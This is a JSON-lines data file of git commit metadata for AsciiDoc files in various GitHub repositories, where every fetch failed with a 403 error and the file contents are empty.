{"commit":"14a9569067cb1ce1d08555e773aded453b81cba0","subject":"Update 2016-6-26-PHRER-array-merge.adoc","message":"Update 2016-6-26-PHRER-array-merge.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHRER-array-merge.adoc","new_file":"_posts\/2016-6-26-PHRER-array-merge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"3bcaefcf7cf31832e184ebe5592cc432f2c6cf25","subject":"Update 2016-10-07-wsdl-xsd.adoc","message":"Update 2016-10-07-wsdl-xsd.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-10-07-wsdl-xsd.adoc","new_file":"_posts\/2016-10-07-wsdl-xsd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"eed6c20371e1eeb34eda89b5ddbccd672a6a0e4d","subject":"Update 2017-03-17-Poetry-3.adoc","message":"Update 2017-03-17-Poetry-3.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-03-17-Poetry-3.adoc","new_file":"_posts\/2017-03-17-Poetry-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b329aa636f4e7a63e293819e76ba141f0b6f3122","subject":"Peer Review","message":"Peer Review\n","repos":"serenity-devstack\/spring-cloud-services-connector","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/serenity-devstack\/spring-cloud-services-connector.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"c20141cc7cebddb586b40a48d05c6a06b5ad6ac0","subject":"Publish 2015-2-1-A-Man-Without-a-Country.adoc","message":"Publish 2015-2-1-A-Man-Without-a-Country.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"2015-2-1-A-Man-Without-a-Country.adoc","new_file":"2015-2-1-A-Man-Without-a-Country.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"30022fdbaf321e34f21dff275012123f799ce6a4","subject":"relation between ports, vSwitch limitation note","message":"relation between ports, vSwitch limitation note\n","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"8d0b270997c41463b9a0d553cf0af81f5b078ae2","subject":"Update 2015-09-20-Flask-learning.adoc","message":"Update 2015-09-20-Flask-learning.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Flask-learning.adoc","new_file":"_posts\/2015-09-20-Flask-learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"bee124d11ec4e016db87d7730ac895458b8aa87d","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2f4e2fe6a4de11889c7a92e870733c10204ab2d6","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"947d8f3b84acc8f1f7f49b2dfc92e86a495658c1","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"be366b749529f434fc0b29756fdda8b6e0b96d6d","subject":"update formatting of command line and link at end of sentence","message":"update formatting of command line and link at end of sentence\n","repos":"docToolchain\/docToolchain,carloslozano\/docToolchain,carloslozano\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,carloslozano\/docToolchain","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"1a1c903b12078963eecdcf63db28cc2b1eb344e6","subject":"Asciidoc readme","message":"Asciidoc readme\n","repos":"koert\/gpio,koert\/gpio,koert\/gpio","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koert\/gpio.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"56296607720e8df821719c2678ebee75a531f2ab","subject":"build.gradle\u4fee\u6b636","message":"build.gradle\u4fee\u6b636\n","repos":"TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TraningManagementSystem\/tms.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"aa050640fd80edea8399b17482f6b2482242d527","subject":"Updated README","message":"Updated README\n","repos":"jxxcarlson\/AsciidocEdit,jxxcarlson\/AsciidocEdit","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/AsciidocEdit.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"ae0175d16f9b584e07f90a7b44916cb12e6fc773","subject":"updated README","message":"updated README\n","repos":"uoa-group-applications\/hooks-jira","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uoa-group-applications\/hooks-jira.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"f02b62a328c94f1ae4eeb21011b3059be279eaa3","subject":"y2b create post The Loudest Wireless Speaker!","message":"y2b create post The Loudest Wireless Speaker!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-06-The-Loudest-Wireless-Speaker.adoc","new_file":"_posts\/2015-10-06-The-Loudest-Wireless-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"dd3abd54ea62e40478f9d86e5c80287473e7ff00","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"40bff8afacd51002b33aa8a2ba463d43ad6397a8","subject":"Update 2015-05-03-Mein-erster-Blogeintrag-mit-Hubpressio.adoc","message":"Update 2015-05-03-Mein-erster-Blogeintrag-mit-Hubpressio.adoc","repos":"fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io","old_file":"_posts\/2015-05-03-Mein-erster-Blogeintrag-mit-Hubpressio.adoc","new_file":"_posts\/2015-05-03-Mein-erster-Blogeintrag-mit-Hubpressio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fundstuecke\/fundstuecke.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0fe4c6192ce3cd79eaf7263ce5c5007e9a1d7fe3","subject":"y2b create post Unboxing Google Home Mini With Demar DeRozan!","message":"y2b create post Unboxing Google Home Mini With Demar DeRozan!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-19-UnboxingGoogleHomeMiniWithDemarDeRozan.adoc","new_file":"_posts\/2017-12-19-UnboxingGoogleHomeMiniWithDemarDeRozan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e0e6d5a3074aed1f45be402840f9aa93695649ae","subject":"[docs] Add lpeers output to ntp monitoring","message":"[docs] Add lpeers output to ntp monitoring\n\nThe ntp monitoring had an example of opeers output and had a tip\nexplaining some versions have lpeers and some others opeers. These two\nare in fact two separate, although similar commands, and as far as I\nknow both of them are available in all modern versions.\n\nAdded an lpeers output, but had to change the lpeers output as well to keep things consistent. I also changed the tip to reflect this.\n\nChange-Id: I5009a330cfd3e81496e95b3e3cf1fb2b7627b085\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/10041\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"000791109f64be139bb04e325c83b3ed7ea21d1b","subject":"docs: update installation with new OS support","message":"docs: update installation with new OS support\n\nAt the time of writing, a couple things are broken:\n1. The SLES 12, Jessie, and Xenial Cloudera repo files contain unsubstituted\n template variables.\n2. The SLES 12 Cloudera kudu package has a dependency (cyrus-sasl-lib) that\n does not exist on SLES 12.\n\nI'm testing a patch to fix #2 and we're trying to fix #1 live. I did verify\nthat the SLES 12 packages work if installation is forced.\n\nChange-Id: I2f51b55561f18fbe28d6bf4ed507dfba65947dc0\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4128\nTested-by: Kudu Jenkins\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"266334d1db8dc501240751f6e59ba44d0b6b82db","subject":"correct paths in 'Adding Service Support' section","message":"correct paths in 'Adding Service Support' section\n","repos":"scottfrederick\/spring-cloud-connectors,spring-cloud\/spring-cloud-connectors,chrisjs\/spring-cloud-connectors,scottfrederick\/spring-cloud-connectors,spring-cloud\/spring-cloud-connectors,chrisjs\/spring-cloud-connectors","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-connectors.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-connectors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottfrederick\/spring-cloud-connectors.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"d07e449343c7ef0efb667fd20aa7822461fcf964","subject":"Create README","message":"Create README","repos":"AlexCzar\/recursive-generics-experiment","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexCzar\/recursive-generics-experiment.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"}
{"commit":"ad39c9086adfba67adfcceec9b0f4e57b02b14b4","subject":"Every project needs a readme :)","message":"Every project needs a readme :)\n","repos":"robotarmorg\/DrawBot","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robotarmorg\/DrawBot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"c0d2bfc5074db1c588f036c692316bb820510392","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"9307143f0b17468c82e5b83aec96477eb187e029","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b36bd1e79bccc00b31ad97954b54dd6e9a652ecf","subject":"docs added","message":"docs added\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"7a3244dcb70efb82820cec5a20aba1716a91fa6e","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"63cfdadda93077dfd429ce6b2a4eada0a95f57e0","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"98b85c0be6af924862dfb66bc7b31b0e1637f1dc","subject":"There is a small inaccuracy in the description","message":"There is a small inaccuracy in the description\n\nFix it.\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"ab8a14004b102f7f1556d0de2717a052475e5280","subject":"Update 2017-06-03-Build-your-own-Vuejs-20-Website-with-ElementUI.adoc","message":"Update 2017-06-03-Build-your-own-Vuejs-20-Website-with-ElementUI.adoc","repos":"tjfy1992\/tjfy1992.github.io,tjfy1992\/tjfy1992.github.io,tjfy1992\/tjfy1992.github.io,tjfy1992\/tjfy1992.github.io","old_file":"_posts\/2017-06-03-Build-your-own-Vuejs-20-Website-with-ElementUI.adoc","new_file":"_posts\/2017-06-03-Build-your-own-Vuejs-20-Website-with-ElementUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tjfy1992\/tjfy1992.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"4f951b39630dad785737f4cdfb68fa0bf6271dc7","subject":"added an overall abstact, made some other minor edits","message":"added an overall abstact, made some other minor edits\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"8168f2197dd277779f2739a727c405266b61bd47","subject":"y2b create post The MacBook Air Affair (Unboxing)","message":"y2b create post The MacBook Air Affair (Unboxing)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-06-The-MacBook-Air-Affair-Unboxing.adoc","new_file":"_posts\/2011-08-06-The-MacBook-Air-Affair-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2f9601c0bf8af203994b80430bb30cc94ed58a5a","subject":"Added project readme.","message":"Added project readme.\n","repos":"jeffrimko\/QuickWin,jeffrimko\/QuickWin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jeffrimko\/QuickWin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c77750c50b55b77f525a1b243a09e4819a08bd6f","subject":"fixed paragraph about Kubernetess wrongly mentioned Cloud Foundry (#152)","message":"fixed paragraph about Kubernetess wrongly mentioned Cloud Foundry (#152)\n\n","repos":"k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"b6488ebc56e2f05949d89e07424deb577fe9659e","subject":"Adding readme file","message":"Adding readme file\n","repos":"craigatk\/grain-theme-bootstrap,craigatk\/grain-theme-bootstrap,craigatk\/grain-theme-bootstrap,craigatk\/grain-theme-bootstrap,craigatk\/grain-theme-bootstrap","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/craigatk\/grain-theme-bootstrap.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"}
{"commit":"419147beecc8bd9e62aa370422ef8808f67d42f1","subject":"Update README","message":"Update README\n","repos":"pjanouch\/acid","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/acid.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"}
{"commit":"127d818ff5760f5a9d5060542d0ad127daa8fe16","subject":"Create README.adoc","message":"Create README.adoc","repos":"ajneu\/x_macros","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ajneu\/x_macros.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"aa5f99d4dd1fc694ce0759ec8e17199f49b8ba85","subject":"Create README.adoc","message":"Create README.adoc","repos":"nmcl\/golang","old_file":"example\/src\/hello\/README.adoc","new_file":"example\/src\/hello\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmcl\/golang.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"299125f66d0dd028e4d4d110bc52dedd50158b3b","subject":"Updates book-using-jison-beyond-the-basics\/Introduction.adoc","message":"Updates book-using-jison-beyond-the-basics\/Introduction.adoc\n\nAuto commit by GitBook Editor","repos":"GerHobbelt\/jison,GerHobbelt\/jison,GerHobbelt\/jison,GerHobbelt\/jison","old_file":"book-using-jison-beyond-the-basics\/Introduction.adoc","new_file":"book-using-jison-beyond-the-basics\/Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GerHobbelt\/jison.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"41c7cbb3488a2dc07e9f56387a36f846459d7e2c","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"da792b079c08a906a7b941353058632138bc818d","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"25c751041a26f083797f347affdedfb667dca58c","subject":"y2b create post Does It Suck? - $37 Android Tablet","message":"y2b create post Does It Suck? - $37 Android Tablet","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-14-Does-It-Suck--37-Android-Tablet.adoc","new_file":"_posts\/2015-08-14-Does-It-Suck--37-Android-Tablet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f7693f7b4d71c22f951430f818b37d4e0b939a09","subject":"y2b create post This Tiny Printer Uses Zero Ink","message":"y2b create post This Tiny Printer Uses Zero Ink","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-13-This-Tiny-Printer-Uses-Zero-Ink.adoc","new_file":"_posts\/2016-10-13-This-Tiny-Printer-Uses-Zero-Ink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"abf07b2fc91d4f3fd4af59f1e6edbaac5e14c8c6","subject":"Update 2017-06-20-Why-I-Have-No-Free-Time-Anymore.adoc","message":"Update 2017-06-20-Why-I-Have-No-Free-Time-Anymore.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-20-Why-I-Have-No-Free-Time-Anymore.adoc","new_file":"_posts\/2017-06-20-Why-I-Have-No-Free-Time-Anymore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
